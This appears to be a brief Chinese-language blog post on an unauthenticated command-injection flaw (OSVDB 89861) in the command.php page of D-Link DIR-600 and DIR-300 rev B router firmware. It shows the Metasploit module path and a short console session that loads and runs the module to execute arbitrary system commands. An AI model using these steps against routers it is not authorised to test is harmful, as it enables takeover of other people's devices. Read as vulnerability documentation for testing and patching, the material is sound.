D-link路由器OSVDB(89861)漏洞

简述

D-Link 生产的DIR-600和DIR-300系列路由器的rev B固件存在系统命令注入漏洞。该漏洞编号为OSVDB(89861)。

产生位置

改漏洞允许用户在未授权的情况下,通过路由器管理后台的command.php页面,执行系统命令

利用方法

在Metasploit中已经集成的此漏洞利用模块
模块名:dlink_dir_300_600_exec_noauth
位置:auxiliary/admin/http/dlink_dir_300_600_exec_noauth

msf > use auxiliary/admin/http/dlink_dir_300_600_exec_noauth
msf auxiliary(dlink_dir_300_600_exec_noauth) > show options 
#...
# set 一系列option
#....
msf auxiliary(dlink_dir_300_600_exec_noauth) > run # 运行

利用改模块可以执行任意的系统命令

你可能感兴趣的:(D-link路由器OSVDB(89861)漏洞)